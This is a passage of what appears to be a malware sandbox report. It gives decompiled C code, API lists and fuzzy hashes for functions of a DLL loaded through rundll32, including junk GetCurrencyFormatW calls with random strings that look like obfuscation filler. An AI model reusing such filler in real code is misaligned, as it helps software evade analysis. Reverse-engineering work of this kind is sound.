					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1001FC9C(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction ID: 9d83087e220dd0781b059ca2b134525f77e60f6c7b422949920854a7550f5502
Opcode Fuzzy Hash: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction Fuzzy Hash: A0F03C34900A19CFEF12DB64CD855ADB7F1FF88B81B200528E48276169CB726E40CF21

Uniqueness

Uniqueness Score: -1.00%

Function 1001E221 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1001E221(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10048888;
					if( *0x10048888 == 0) {
						_t5 = GetTickCount();
						 *0x10048888 =  *0x10048888 + 1;
						__eflags =  *0x10048888;
						 *0x100453a0 = _t5;
					}
					_t4 = GetTickCount() -  *0x100453a0;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100453a0 = _t4;
					}
					return _t4;
				}
				return E1001E1CA(_t7, _t8, _t9, _t13, _t14, _a8);
			}

APIs

GetTickCount.KERNEL32 ref: 1001E243
GetTickCount.KERNEL32 ref: 1001E250
CoFreeUnusedLibraries.OLE32 ref: 1001E25F
GetTickCount.KERNEL32 ref: 1001E265

Part of subcall function 1001E1CA: CoFreeUnusedLibraries.OLE32(00000000,1001E2A9,00000000), ref: 1001E20E
Part of subcall function 1001E1CA: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1001E2A9), ref: 1001E214

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction ID: 9aa4607869117499f4b65bf9b804208a697730aabcf92e8cb44ab6419cd381d0
Opcode Fuzzy Hash: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction Fuzzy Hash: D2E0ED30C04265DEE705EF20CE8464D3AE4FB4A392F914916E441DA161C7749EC0DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001842E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001842E(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10004D4A( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10004D4A( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10017B9D(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10020F40(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E1000911A( &_v20);
										E100157C0(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10004D75(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10004D75(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10017B9D(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

APIs

VariantClear.OLEAUT32(?), ref: 10018467

Strings

(, xrefs: 10018577

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction ID: 6ae8da63e7d5010fc6edffe141db471ece515f0fbfe2aaea2c8eafc942244063
Opcode Fuzzy Hash: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction Fuzzy Hash: A6516875A00B01DFDB64CF68C9C295AB7F1FF48314B504A6EE5868BA91CB70FA80CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1001615A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E1001615A(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1001FBC4(E10034098, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1003b29c);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1001FC9C(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1001BDF4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x100388d8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x100388dc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1003b2ec);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x10044410;
					E100209E8( &_v24, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t128, _t153, _t155);
					_t132 = E100105C8(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1000E58E(_t132);
					}
					return E1001FC9C(_t90);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10016161

Strings

@, xrefs: 100161C4

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction ID: a1e3f74af39593b6165eabf356290d244c81fe92429bd0fa7cefced01a7d7b0f
Opcode Fuzzy Hash: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction Fuzzy Hash: 3351B671A0021A9FDB04CFA8C8849EEB7F9FF48304F15456EE516EB251EB74A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100061E5(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10045580; // 0x2ef01728
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10005C93(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10005EFE(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1001FBB5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000620B
PathFindExtensionA.SHLWAPI(?), ref: 10006221

Part of subcall function 10005C93: _strcpy_s.LIBCMT ref: 10005C9F

Part of subcall function 10005EFE: __EH_prolog3.LIBCMT ref: 10005F1D
Part of subcall function 10005EFE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
Part of subcall function 10005EFE: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004

Strings

%s.dll, xrefs: 10006227

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction ID: 87bbfe94c284bf79419f18a095101e7eadcc839ae2e31c05850216e2d59394d5
Opcode Fuzzy Hash: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction Fuzzy Hash: A001F972A0051C6FEB19DB74CD569EE73B9EF08740F0101A9F502E7144EA71AE048751

Uniqueness

Uniqueness Score: -1.00%

Function 100014F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100014F4(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v12 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x30;
				_v8 =  *[fs:ebx];
				return _v8;
			}

0x10001522
0x1000152b
0x10001533

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001512

Strings

xadqsavcbdfewescGADW, xrefs: 100014FF
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001506

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction ID: 41eada4d2328894fcd37416b6f2f2abe75c7e90fa58e6643f2faad819eee2c9b
Opcode Fuzzy Hash: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction Fuzzy Hash: 42E0B6B5A50208BFE705CB88DDD6FCABBB8EB09705F114055F705EB691D3B0AA508A64

Uniqueness

Uniqueness Score: -1.00%

Function 10001DE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DE9(void* __esi, intOrPtr _a4) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  !(__esi - 1) & _a4 + __esi - 0x00000001;
			}

0x10001e1f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E01

Strings

xadqsavcbdfewescGADW, xrefs: 10001DEE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DF5

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
Instruction ID: a6bb75da600a1c00fcd3d833fe1878cb6779512402ee289b34badc6351d60fc0
Opcode Fuzzy Hash: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
Instruction Fuzzy Hash: 83D09E75388202AEF619C740CD97FD5B754A755706F11800CF346EE5D1CBA651558B14

Uniqueness

Uniqueness Score: -1.00%

Function 10001DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DB6(signed int _a4, intOrPtr _a8) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  !(_a8 - 1) & _a4;
			}

0x10001de8

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001DCE

Strings

xadqsavcbdfewescGADW, xrefs: 10001DBB
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DC2

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction ID: 693cd55018ed01a535ded29b615326f2d298561c8c1b69a974d3bac9f79f4422
Opcode Fuzzy Hash: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction Fuzzy Hash: CED0C9753887017AFA09D741DE97FC6B750E795B06F019008F749EE5D1CBB890408F15

Uniqueness

Uniqueness Score: -1.00%

